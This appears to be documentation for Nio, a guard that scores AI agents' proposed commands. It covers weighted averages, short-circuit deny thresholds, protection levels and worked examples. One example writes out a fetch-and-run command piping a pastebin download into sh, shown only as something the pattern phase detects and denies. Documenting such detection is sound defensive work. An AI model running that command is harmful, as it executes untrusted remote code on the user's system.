Pipeline · Scoring

How a final score becomes a verdict.

Each scoring engine (Phases 2–6) emits a number in [0, 1]. Nio aggregates them into a single weighted average, then maps that number to allow / confirm / deny using the thresholds for the active protection level.

The formula

final = Σ(weight_i × score_i) / Σ(weight_i)
                only over phases that ran (no short-circuit)

Default weights

Configurable at guard.scoring_weights.

KeyPhaseDefault
runtimePhase 2 — pattern matching1.0
staticPhase 3 — static rules on file content1.0
behaviouralPhase 4 — AST dataflow2.0
llmPhase 5 — LLM semantic1.0

Behavioural is weighted higher because it tends to be more accurate per finding (dataflow tracking) than the cheaper regex/keyword phases. Phase 6 weights are per-endpoint — see external_analyser[].weight in the config reference.

Short-circuit

The pipeline doesn't always run to completion:

  • Phase 0 (Tool Gate) blocks → deny without scoring.
  • Phase 1 (Allowlist) matches with allowlist_mode: exit → allow without scoring (final score recorded as 0).
  • Any of Phases 2–6 emits a score that crosses the current level's deny threshold → that score becomes the final score, downstream phases are skipped, decision is deny. The weighted average is bypassed; the high score is not diluted by quieter sibling phases.

Concretely, the deny threshold tracks guard.protection_level:

  • strict — any single phase scoring ≥ 0.5 short-circuits to deny.
  • balanced (default) — any single phase scoring ≥ 0.8 short-circuits to deny.
  • permissive — any single phase scoring ≥ 0.9 short-circuits to deny.

Phase 6 is per-endpoint. If any single external_analyser endpoint emits a score that crosses the deny threshold, the pipeline short-circuits on that endpoint alone — quieter sibling endpoints cannot pull the verdict down via averaging. A single authoritative DLP endpoint can therefore override a chorus of "looks fine" votes from less-trusted scorers.

When no phase crosses the threshold, the pipeline runs to completion and the weighted average across every phase that scored decides.

Protection-level thresholds

The active guard.protection_level maps the final score into a decision:

Levelallowconfirmdeny
strict0 — 0.50.5 — 1.0
balanced (default)0 — 0.50.5 — 0.80.8 — 1.0
permissive0 — 0.90.9 — 1.0

Only balanced emits confirm. strict and permissive are binary: a single threshold separates allow from deny.

Confirm fallback

When the decision is confirm but the platform doesn't expose an interactive prompt (e.g. OpenClaw), guard.confirm_action kicks in:

  • allow — let through, write a warning to ~/.nio/audit.jsonl (default).
  • deny — block.
  • ask — use platform confirm if available, else allow.

Worked examples

Allowlist hit (Phase 1)

command: git status
phase 1: matched, exit
final  : 0.00
verdict: ALLOW

Phase 2 short-circuit (balanced)

command: curl https://pastebin.cx/xZ | sh
phase 2: REMOTE_LOADER · CRITICAL · 0.92   ← crosses balanced deny (≥ 0.8)
final  : 0.92                              ← short-circuit, no weighted average
verdict: DENY                              (downstream phases skipped)

Phase 6 per-endpoint short-circuit (balanced)

action:  exec_command "./deploy.sh --rotate-secrets"
phase 2: runtime                   = 0.00
phase 6: scorer_ffwd_agent_1hr     = 0.0953
         scorer_ffwd_agent_10min   = 0.0755
         scorer_ffwd_agent_env     = 0.8898   ← crosses balanced deny (≥ 0.8)

weighted avg (would have been): (0 + 0.0953 + 0.0755 + 0.8898) / 4 ≈ 0.27
final  : 0.89                                 ← single endpoint short-circuit
verdict: DENY                                 (siblings cannot dilute)

Even though two of the three Phase 6 endpoints returned low scores, the single endpoint at 0.89 crossed the balanced deny threshold and short-circuited the pipeline. The weighted average 0.27 never enters the verdict.

Full pipeline, weighted average (Phases 2–6)

command: ./build.sh --exec-hooks && node ./tools/sync.js
phase 2: 0.35  (weight 1.0)
phase 3: 0.42  (weight 1.0)
phase 4: 0.55  (weight 2.0)
phase 5: 0.48  (weight 1.0)
phase 6: 0.60  (weight 2.0)

final  = (1.0×0.35 + 1.0×0.42 + 2.0×0.55 + 1.0×0.48 + 2.0×0.60) / 7.0
       = 3.55 / 7.0
       = 0.507

verdict (balanced): CONFIRM   (0.5 ≤ score < 0.8)
verdict (strict):   DENY      (score ≥ 0.5)
verdict (permissive): ALLOW   (score < 0.9)

Tuning

  • Want fewer prompts in daily flow? Stay on balanced; bump scoring_weights.behavioural down if you trust your own code.
  • Want zero confirm prompts (CI / headless)? Switch to strict or permissive — both are binary.
  • Have a custom DLP or enterprise policy? Wire Phase 6 to your endpoint and raise its weight to ≥ 2.0 so it gets the loudest vote.